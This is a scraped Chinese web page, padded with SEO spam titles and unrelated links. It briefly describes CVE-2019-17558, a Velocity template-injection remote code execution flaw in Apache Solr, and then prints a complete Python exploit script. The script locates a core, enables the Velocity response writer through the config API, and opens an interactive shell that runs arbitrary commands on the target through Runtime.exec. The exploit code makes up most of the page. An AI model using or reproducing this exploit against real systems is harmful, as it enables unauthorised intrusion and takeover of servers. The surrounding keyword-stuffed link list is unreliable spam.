当前位置: 首页 > news >正文

静安网站建设鼓楼网站seo搜索引擎优化

静安网站建设,鼓楼网站seo搜索引擎优化,哪个公司网站做的最好,网站建设的完整流程图漏洞描述 Apache Velocity是一个基于Java的模板引擎,它提供了一个模板语言去引用由Java代码定义的对象。Velocity是Apache基金会旗下的一个开源软件项目,旨在确保Web应用程序在表示层和业务逻辑层之间的隔离(即MVC设计模式)。 Apa…

漏洞描述

        Apache Velocity是一个基于Java的模板引擎,它提供了一个模板语言去引用由Java代码定义的对象。Velocity是Apache基金会旗下的一个开源软件项目,旨在确保Web应用程序在表示层和业务逻辑层之间的隔离(即MVC设计模式)。 Apache Solr 5.0.0版本至8.3.1版本中存在输入验证错误漏洞。攻击者可借助自定义的Velocity模板功能,利用Velocity-SSTI漏洞在Solr系统上执行任意代码。

执行漏洞py脚本,取得shell连接

F:\exphub-master\solr>python cve-2019-17558_cmd.py

EXP

#!/usr/bin/python3
#-*- coding:utf-8 -*-
# author:zhzyker
# from:https://github.com/zhzyker/exphub
# telegram:t.me/zhzykerimport requests
import sys
import jsonif len(sys.argv)!=2:print('+------------------------------------------------------------+')print('+ DES: by zhzyker as https://github.com/zhzyker/exphub       +')print('+      Apache Solr Velocity Commons Remote Code Execution    +')print('+------------------------------------------------------------+')print('+ USE: python3 cve-2019-17558_cmd.py <url>                   +')print('+ EXP: python3 cve-2019-17558_cmd.py http://1.1.1.1:8983     +')print('+ VER: Apache Solr 5.0.0 - 8.3.1                             +')print('+------------------------------------------------------------+')sys.exit(0)url = sys.argv[1]core_url = url + "/solr/admin/cores?indexInfo=false&wt=json"
try:r = requests.request("GET", url=core_url, timeout=10)core_name = list(json.loads(r.text)["status"])[0]print ("[+] GET API: "+url+"/solr/"+core_name+"/config")
except:print ("[-] Target Not Vuln Good Luck")sys.exit(0)api_url = url + "/solr/" +core_name+ "/config"
headers = {"Content-Type": "application/json"}
set_api_data ="""
{"update-queryresponsewriter": {"startup": "lazy","name": "velocity","class": "solr.VelocityResponseWriter","template.base.dir": "","solr.resource.loader.enabled": "true","params.resource.loader.enabled": "true"}
}
"""
api = requests.request("POST", url=api_url, data=set_api_data, headers=headers)
code = str(api.status_code)
if api.status_code == 200:print ("[+] <HTTP" +code+ "> SET API Success")
else:print ("[-] <HTTP" +code+ "> SET API Failed Good Luck")sys.exit(0)def do_exp(cmd):vuln_url = url+"/solr/"+core_name+"/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27"+cmd+"%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end"r = requests.request("GET", vuln_url)print (r.text)while 1:cmd = input("Shell >>> ")if cmd == "exit" : exit(0)do_exp(cmd)

http://www.zhongyajixie.com/news/65227.html

相关文章:

  • 京东商城网站地址是多少免费的seo教程
  • wordpress仿qq空间万能优化大师下载
  • 网站建设主要课程西安外包公司排行
  • 云主机和云服务器的区别广西关键词优化公司
  • 重庆建网站诚选快忻科技悉心真正免费的建站
  • 在线网页截图上海优化seo排名
  • 佛山新网站建设咨询英文seo
  • 如何制作自己的网站模版seo研究中心
  • 自适应网站案例源码爱站网长尾关键词
  • 阿玛尼高仿手表网站青岛招聘seo
  • wordpress 首页 矩阵南宁百度seo排名
  • 在阿里巴巴上做网站需要什么软件免费推广方法
  • 河北企业建站品牌营销策划公司排名
  • 宁波网站建设哪家好百度网盘官网入口
  • 公司注册网站入口郑州网站营销推广
  • 音乐介绍网站怎么做杭州百度推广开户
  • 高水平大学建设大学网站公司网站搭建
  • 如何管理好一个团队河南做网站优化
  • 企业网站建设运营的灵魂排名怎么优化快
  • 网站模版防被偷东莞做网站公司首选
  • 宝安网站优化下载百度安装到桌面
  • 邯郸做网站询安联网络吉林seo网络推广
  • 做购物网站百度营业执照怎么办理
  • 表白二维码图片seo外包品牌
  • wordpress官方主题教程seo自动优化工具
  • 哪里有免费的网站模板下载网站优化排名服务
  • 不参与网站建设的弊端运营推广的方式和渠道
  • 做网站 写脚本是什么西安推广平台排行榜
  • seo搜索引擎入门教程湖北seo诊断
  • 一个数据库怎么做二个网站搜索引擎优化效果